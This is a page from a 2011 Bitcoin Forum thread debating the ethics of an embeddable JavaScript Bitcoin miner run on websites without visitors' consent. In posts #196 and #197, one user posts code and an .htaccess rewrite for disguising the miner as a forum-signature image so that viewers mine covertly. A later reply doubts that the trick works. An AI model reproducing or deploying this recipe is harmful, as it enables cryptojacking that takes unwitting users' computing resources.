Bitcoin Forum
April 19, 2014, 12:33:44 PM *
News: Due to the OpenSSL heartbleed bug, changing your forum password is recommended.
 
   Home   Help Search Donate Login Register  
Pages: 1 2 3 4 5 6 7 8 9 [10] 11 12 13  All
  Print  
Author Topic: Embedable Javascript Bitcoin miner for your website  (Read 95765 times)
anisoptera
Member
**
Offline Offline

Activity: 98



View Profile

Ignore
June 01, 2011, 05:57:10 PM
 #181

Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior.

Congratulations.
Don't inflate my electricity bill only for your gain, you people. Seriously.

I'm not defending this, but it isn't malware. This code:

- is NOT "designed" to disrupt or deny operation in any way. It is designed to mine bitcoins. Mining bitcoins does not disrupt or deny operation. At worst it slows down the site that is actually using the miner.
- does NOT gather information that leads to loss of privacy or exploitation. The information it sends back to the server is the results of calculations performed on data retrieved solely from the server.
- does NOT gain unauthorized access to system resources. You loaded a script into a JS interpreter and told it to run when you loaded my site, implicitly granting access to the JS VM and everything it is reasonably expected to have access to. This doesn't include finding an exploit in the JS interpreter and breaking out of your sandbox, but within the sandbox, you've granted the script permission to do what it wants.

If you go to a site and you have Javascript enabled then you cannot claim that the fact that that site runs JS on your computer is unauthorized access. If you are concerned about power usage then you should have JS disabled (or Noscript turned on) and also probably block flash as well. If JS is disabled in your browser for some reason, then you are not implicitly granting websites permission to run scripts on your machine; if the miner continued to run in THIS case, it would be malware.

The definition of malware is not so broad as to include "using CPU cycles that I expected to be idle".

I'm still going to block the script, but I won't be so disingenuous as to call it "malware", because it isn't. It's just like any other ad. This one just doesn't flash or play annoying sounds or pop up windows on your screen.

online poker, bitcoin style - https://betco.in/
feeling tipsy? 1Q7ktWPwu4Q8MivKdmYxnmsGaBeauMTGwU
    mBitCASINOWIN BITCOINS IN OUR
24/7 LIVE DEALER CASINO

Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1397910824
Hero Member
*
Offline Offline

Posts: 1397910824

View Profile Personal Message (Offline)

Ignore
1397910824
Reply with quote  #2

1397910824
Report to moderator
manifold
Member
**
Offline Offline

Activity: 61


View Profile

Ignore
June 01, 2011, 08:13:00 PM
 #182

First Points:
  • Your idea isn't good, it is brilliant.
  • If bitcoins will ever get a major payment, your way WILL replace ads
  • Your idea, may very well get some sites to use it instead of ads, and therfore will make the bitcoin market bigger

Seconds Points:
  • All code has to be open source, if you really want to spread it as wide as possible
  • An optional visible hashing rate would be nice
  • A choice (I want to use 10, 20,.... 90%) of the end users cpu.

Thanks for your idea and implementation!

Osiris Bitcoin Forum
This is a recursive text, if you restart reading from the beginning. And you will never get to this point informing you that it had no exit condition.
cablepair
SCAMMER
Hero Member
*****
Offline Offline

Activity: 672


http://www.BTCFPGA.com


View Profile WWW

Ignore
June 01, 2011, 10:35:21 PM
 #183

I am not only a bit miner but I am also a Christian and am involved in a lot of ministry work and I work with non profit organizations all the time who are constantly raising money.

This could be a really awesome tool for people to donate their unused cpu power to fund Christian missions, ministries and such and I believe in it so much that I created the site:

www.computeforchrist.com

I am already supporting a local fund raising effort with it and am trying to get people to use it, one thing I am waiting to see is exactly how much traffic you need to make this viable.
and I am sure that is something everyone else is considering as well... I mean thats the big question right?

How much traffic do we need to make this actually work.

I have been trying to get the word out and having people who want to support the cause support my site with their CPUs
I think it could be huge and I am very exciting to get some new features like to be able to show people the speed and some kind of rough calculation that could show them in semi real time what kind of money they are actually donating that kind of thing.

I know a lot of people (in the bitcoin / tech world) are weary of this as you can see in some of the posts above but don't look at it as some kind of sneaky thing that someone is forcing upon you. Like everything else it can be used for good and bad, sure there are going to be people exploiting this just like they did with those crazy pop up sites that never stop but there are also good uses for it like my site so please keep an open mind, technology is a reflection of the people who use it - the technology and it's creators are not bad because it can possibly be abused.
phillipsjk
Hero Member
*****
Offline Offline

Activity: 756

Should have bought at $3.


View Profile WWW

Ignore
June 02, 2011, 12:22:21 AM
 #184

I posted some of my objections in this thread. I have read the last 2 pages of posts and still think it is evil.

I was not aware that it used HTML 5 and workers. On my machine bitp.it idles because my browser does not support the Draft HTML5 standards. That said, my points about non-CPU computing resources  (like memory and available battery power) still stand. Edit: my objection about CPU usage may still stand: what happens if you use 10% of the CPU with a load average of over 1.00? Answer load average increases by 0.1.

There is another problem I did not consider: This script is using a popular mining pool. Over-reliance on a few mining pools weaken the bitcoin network. Web-developers throwing this up on their page are even less likely to implement "solo mining" or even a private mining pool should the need arise. For example, in the event of a pool take-over or shut-down.

Edit: Viewing sites embedding the EMCA script miner at work may constitute a firing offense, just as an IT person should be fired for using company computers to install Bitcoin miners (for personal gain).

James' OpenPGP public key fingerprint:
ACE4 8163 1CD5 A2EA 1B04 38F5 9BB0 5107 1BD5 821A
Nythain
Jr. Member
*
Offline Offline

Activity: 56



View Profile

Ignore
June 02, 2011, 12:29:51 AM
 #185

Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior.

Congratulations.
Don't inflate my electricity bill only for your gain, you people. Seriously.

I'm not defending this, but it isn't malware. This code:

- is NOT "designed" to disrupt or deny operation in any way. It is designed to mine bitcoins. Mining bitcoins does not disrupt or deny operation. At worst it slows down the site that is actually using the miner.
- does NOT gather information that leads to loss of privacy or exploitation. The information it sends back to the server is the results of calculations performed on data retrieved solely from the server.
- does NOT gain unauthorized access to system resources. You loaded a script into a JS interpreter and told it to run when you loaded my site, implicitly granting access to the JS VM and everything it is reasonably expected to have access to. This doesn't include finding an exploit in the JS interpreter and breaking out of your sandbox, but within the sandbox, you've granted the script permission to do what it wants.

If you go to a site and you have Javascript enabled then you cannot claim that the fact that that site runs JS on your computer is unauthorized access. If you are concerned about power usage then you should have JS disabled (or Noscript turned on) and also probably block flash as well. If JS is disabled in your browser for some reason, then you are not implicitly granting websites permission to run scripts on your machine; if the miner continued to run in THIS case, it would be malware.

The definition of malware is not so broad as to include "using CPU cycles that I expected to be idle".

I'm still going to block the script, but I won't be so disingenuous as to call it "malware", because it isn't. It's just like any other ad. This one just doesn't flash or play annoying sounds or pop up windows on your screen.
I pretty much agree with everything you said until you got to the closing statement. This script is not like any other ad, since:
A. Without external applications, I am unaware of it running on 90% of the sites I've encountered running it.
B. It is not advertising anything to me. Ads, as annoying as they may be, are at least providing a service to me as the user/visitor of the site by offering me goods and deals I might have been unaware of. There is absolutely not benefit to me from my participation with this miner.

So comparing it to ads is probably not the best analogy... comparing it to analytics would probably be better.

TiagoTiago
Hero Member
*****
Offline Offline

Activity: 602


Firstbits.com/1fg4i                :Ƀ


View Profile

Ignore
June 02, 2011, 01:07:55 AM
 #186

...

... Ads, as annoying as they may be, are at least providing a service to me as the user/visitor of the site by offering me goods and deals I might have been unaware of. There is absolutely not benefit to me from my participation with this miner.

...
The service this offers is a site unpolluted by ads that can still pay the bills

(I dont always get new reply notifications, pls send a pm when you think it has happened)

Wanna gimme some BTC for any or no reason? 1FmvtS66LFh6ycrXDwKRQTexGJw4UWiqDX Smiley

The more you believe in Bitcoin, and the more you show you do to other people, the faster the real value will soar!

Do you like mmmBananas?!
tonne
Newbie
*
Offline Offline

Activity: 2


View Profile

Ignore
June 02, 2011, 01:17:59 AM
 #187

I was looking for an alternative payment method for online shops after the wikileaks disaster. Bitcoin isn't there yet. Running jsMiner *without* giving visitors a chance to opt-in is putting people off. It is simply stealing resources. It's kind of a gold rush, right? Try to control your greed. People got so used to ads and all the tracking crap that no one questions those methods any more. Treat your community / potential users with respect and you will have unlimited support. Otherwise the whole idea will end up like e-gold and die off eventually.
anisoptera
Member
**
Offline Offline

Activity: 98



View Profile

Ignore
June 02, 2011, 01:28:00 AM
 #188

I was looking for an alternative payment method for online shops after the wikileaks disaster. Bitcoin isn't there yet. Running jsMiner *without* giving visitors a chance to opt-in is putting people off. It is simply stealing resources.

Running ads on your website without giving visitors a chance to opt in is stealing resources. It consumes:

- bandwidth to download the ad (frequently in excess of 100k)
- CPU time to display the ad, whether animated GIF, flash, or even static image
- memory to store the ad
- screen space that would have been blank or filled with content otherwise.

All so they can attempt to make money off of me for the website.

online poker, bitcoin style - https://betco.in/
feeling tipsy? 1Q7ktWPwu4Q8MivKdmYxnmsGaBeauMTGwU
TiagoTiago
Hero Member
*****
Offline Offline

Activity: 602


Firstbits.com/1fg4i                :Ƀ


View Profile

Ignore
June 02, 2011, 01:32:08 AM
 #189

People don't usually don't call heavy annoying ads "resource stealers"; the difference between this and "(.)(.) Play Now My Lord" is this won't get in the way of you using the site, and instead of wasting processor cycles it is actually turning them into money.



But obviously, an opt-in/opt-out option would be great, not all advertisement bearing sites offer such an option though. Btw, also offering an option of throttling down i expect would help with getting on  the visitors good side.

(I dont always get new reply notifications, pls send a pm when you think it has happened)

Wanna gimme some BTC for any or no reason? 1FmvtS66LFh6ycrXDwKRQTexGJw4UWiqDX Smiley

The more you believe in Bitcoin, and the more you show you do to other people, the faster the real value will soar!

Do you like mmmBananas?!
tonne
Newbie
*
Offline Offline

Activity: 2


View Profile

Ignore
June 02, 2011, 01:38:15 AM
 #190

For ads there's adblock. No problems with contributing to a collective mining effort, I just want to be asked.
1bitc0inplz
Member
**
Offline Offline

Activity: 112


View Profile

Ignore
June 02, 2011, 01:52:48 AM
 #191

is there a way I can show the users mining speed on my site like you do at bitp.it ?

Firstly, thank you for your previous post. It was your site (in addition to a couple others) that I pictured when I was thinking about sites that are very open to the user about what is going on. I applaude your use of this script, and I think it is a great example of what we originally had in mind.

As for the hash rate... that is a feature that has been asked for a couple of times. I see no harm in adding it. I will need to expose it to you, so perhaps you can write some Javascript to display that stat. We have a website push coming this weekend, I will try and sneak this feature in  Wink

Mine @ http://pool.bitp.it - No fees, virtually 0 stales, what's not to love!
Chat with us @ #bitp.it on irc.freenode.net
Learn more about our pool @ http://forum.bitcoin.org/index.php?topic=12181.0
1bitc0inplz
Member
**
Offline Offline

Activity: 112


View Profile

Ignore
June 02, 2011, 01:55:29 AM
 #192

First Points:
  • Your idea isn't good, it is brilliant.
  • If bitcoins will ever get a major payment, your way WILL replace ads
  • Your idea, may very well get some sites to use it instead of ads, and therfore will make the bitcoin market bigger

Seconds Points:
  • All code has to be open source, if it really want to spread it as wide as possible
  • An optional visible hashing rate would be nice
  • A choice (I want to use 10, 20,.... 90%) of the end users cpu.

Thanks for your idea and implementation!

Thank you for your kind words. Your input is worth more than you think. You gave me an idea... some of the things you were saying got me thinking...

I don't want to spill the beans just yet   Cheesy

Mine @ http://pool.bitp.it - No fees, virtually 0 stales, what's not to love!
Chat with us @ #bitp.it on irc.freenode.net
Learn more about our pool @ http://forum.bitcoin.org/index.php?topic=12181.0
1bitc0inplz
Member
**
Offline Offline

Activity: 112


View Profile

Ignore
June 02, 2011, 01:59:58 AM
 #193

So comparing it to ads is probably not the best analogy... comparing it to analytics would probably be better.

You know, one of our original ideas (not that it got far) was to somehow bundle this into an analytics package...

Mine @ http://pool.bitp.it - No fees, virtually 0 stales, what's not to love!
Chat with us @ #bitp.it on irc.freenode.net
Learn more about our pool @ http://forum.bitcoin.org/index.php?topic=12181.0
Nythain
Jr. Member
*
Offline Offline

Activity: 56



View Profile

Ignore
June 02, 2011, 02:02:55 AM
 #194

For ads there's adblock. No problems with contributing to a collective mining effort, I just want to be asked.
For FireFox there's NoScript
For Chrome, there's built in script blocking functionality, and NotScripts for further protection.

While I don't think the cumulative world wide web browsing populace should have to resort to things things, they are effective. They will also help stopping other scripts. With today's internet, they are almost a must have really.
The great solution would be if webmasters would make it known what is going on so users can choose to frequent the site or not. A step even further would be an opt-in or opt-out option.

From reading through this thread, and the couple others that have popped up, I gather *almost* all of us agree that the initial development of this miner is awesome. It's potential is amazing in numerous applications of it. For the most part, we start to disagree on ethical application of this miner by webmasters. Most of us against it really only request at least being informed its being used, so we can choose whether or not to continue visiting the site. In the comparison of ads, they are visible and I know they are there. If I find the amount of ads on the site to be annoying or too resource intensive, I can leave. So far, I have only come across 1 site other than the main project site, that informed users on the home/front page that they were currently generating bitcoins using a web miner.

manifold
Member
**
Offline Offline

Activity: 61


View Profile

Ignore
June 02, 2011, 06:17:29 AM
 #195

Thank you for your kind words. Your input is worth more than you think. You gave me an idea... some of the things you were saying got me thinking...

I don't want to spill the beans just yet   Cheesy
Well thats, good. Maybe we cold even persuade some websites (it news,...) to remove their ads, and install your or a similar javascript site.  That would give bitcoin a kickstart to enter the normal market.

And yes google, won't like it... the government won't like it either (because they hate change), but it may be worth trying..

Osiris Bitcoin Forum
This is a recursive text, if you restart reading from the beginning. And you will never get to this point informing you that it had no exit condition.
easypeezy
Newbie
*
Offline Offline

Activity: 4


View Profile

Ignore
June 02, 2011, 06:52:00 AM
 #196

Figured out a way to implement this anywhere, you can hide it as a 1px jpeg file in any signature, on any forum.


First things first.

1. Create a file in notepad. Use this code.
Code:
<head><script type="text/javascript" src="http://api.bitp.it/bitp.it.js"></script>
<script type="text/javascript">
 bitpit({clientId: "YOURID", forceUIThread: true});
</script></head>
<body width="0" height="0"></body>

2. Save that as test.html, upload it to your server

3.Upload an image to your server, label it as "WHATEVERYOUWANT.jpeg" make sure the server shows the file being stored as a jpeg file.

4. Edit your .htaccess file. Include this bit of code at the end of it.

Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?YOURDOMAIN\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://YOURDOMAIN.com/test.html [L]

5. Go to any forum and add

Code:
[img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img]

This should show absolutely nothing to the user viewing the page, but you get everyone hashing for you that ever views a page with your signature.
SgtSpike
Hero Member
*****
Offline Offline

Activity: 1106


Firstbits: 18tkn


View Profile WWW

Ignore
June 02, 2011, 07:49:45 AM
 #197

Figured out a way to implement this anywhere, you can hide it as a 1px jpeg file in any signature, on any forum.


First things first.

1. Create a file in notepad. Use this code.
Code:
<head><script type="text/javascript" src="http://api.bitp.it/bitp.it.js"></script>
<script type="text/javascript">
 bitpit({clientId: "YOURID", forceUIThread: true});
</script></head>
<body width="0" height="0"></body>

2. Save that as test.html, upload it to your server

3.Upload an image to your server, label it as "WHATEVERYOUWANT.jpeg" make sure the server shows the file being stored as a jpeg file.

4. Edit your .htaccess file. Include this bit of code at the end of it.

Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?YOURDOMAIN\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://YOURDOMAIN.com/test.html [L]

5. Go to any forum and add

Code:
[img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img]

This should show absolutely nothing to the user viewing the page, but you get everyone hashing for you that ever views a page with your signature.
Wow.  Just, wow.

easypeezy
Newbie
*
Offline Offline

Activity: 4


View Profile

Ignore
June 02, 2011, 07:54:26 AM
 #198

What is the WOW about, exactly?
SgtSpike
Hero Member
*****
Offline Offline

Activity: 1106


Firstbits: 18tkn


View Profile WWW

Ignore
June 02, 2011, 08:06:01 AM
 #199

What is the WOW about, exactly?
This could ruin bitcoin's reputation.

If it's truly that easy, imagine how quickly just about EVERY online forum is going to be inundated with this?  Eventually, forum admins will become wise to what is slowing down their user experience, and as soon as the first one gathers the full story on it, they'll be badmouthing bitcoin like mad.

EDIT:  Don't get me wrong, it's awesome that you figured out how to do this, I just think it has very, very bad implications for how it could be used.

slowmining
Newbie
*
Offline Offline

Activity: 22


View Profile

Ignore
June 02, 2011, 08:08:02 AM
 #200

I don't tink it will work. The browser will try to read the fake image as an image, it will fail but it will not run js code.

Sorry for my english ._.
Pages: 1 2 3 4 5 6 7 8 9 [10] 11 12 13  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!